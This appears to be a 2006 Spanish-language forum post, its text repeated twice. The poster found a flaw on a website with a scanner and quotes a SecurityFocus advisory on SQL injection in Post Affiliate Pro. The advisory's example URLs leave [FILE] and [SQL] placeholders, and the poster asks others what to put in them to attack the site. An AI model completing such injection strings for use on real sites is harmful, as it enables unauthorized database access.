Lo-Ko
12-09-2006, 01:04
Holas miren he encontrado una vulnerabilidad en una web con acunetix, y he buscado el correspondiente xploit en securityfocus.com el cual me ha respondido:
Post Affiliate Pro Index.PHP SQL Injection Vulnerability
No exploit is required.
The following examples were provided:
http://www.example.com/merchants/index.php?md=[FILE]
http://www.example.com/postaffiliatepro/merchants/index.php?tm_userid=_&tm_
orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_
status=_&numrows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt
ype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=Affiliate_Merchants_Views_TransactionManager&type=all&list_page=0&action=&sortby=ip&sortorder=[SQL]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_s
tatus=_&numrows=20&filtered=1&md=Affiliate_Merchants_Views_AffiliateManager&list_page=0&sortby=a.surname&action=&sortorder=[SQL]
la cuestion es que nose que tengo que poner en [FILE] y [SQL] creo que en file va un archivo(la base de datos) y en sql la sentencia sql que muestra lo que te interesa, bien pues se algo de sql pero no mucho, y tampoco tengo idea de que poner ni en file ni sql asi que si me pudierais dar una ayudita lo agradeceria, y otra cosa realmente no se que hace este "exploit" que se obtiene con el he mirado la definicion que daba securityfocus pero estaba en ingles y no me he enterao mucho.
Gracias y saludos.
Post Affiliate Pro Index.PHP SQL Injection Vulnerability
No exploit is required.
The following examples were provided:
http://www.example.com/merchants/index.php?md=[FILE]
http://www.example.com/postaffiliatepro/merchants/index.php?tm_userid=_&tm_
orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_
status=_&numrows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt
ype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=Affiliate_Merchants_Views_TransactionManager&type=all&list_page=0&action=&sortby=ip&sortorder=[SQL]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_s
tatus=_&numrows=20&filtered=1&md=Affiliate_Merchants_Views_AffiliateManager&list_page=0&sortby=a.surname&action=&sortorder=[SQL]
la cuestion es que nose que tengo que poner en [FILE] y [SQL] creo que en file va un archivo(la base de datos) y en sql la sentencia sql que muestra lo que te interesa, bien pues se algo de sql pero no mucho, y tampoco tengo idea de que poner ni en file ni sql asi que si me pudierais dar una ayudita lo agradeceria, y otra cosa realmente no se que hace este "exploit" que se obtiene con el he mirado la definicion que daba securityfocus pero estaba en ingles y no me he enterao mucho.
Gracias y saludos.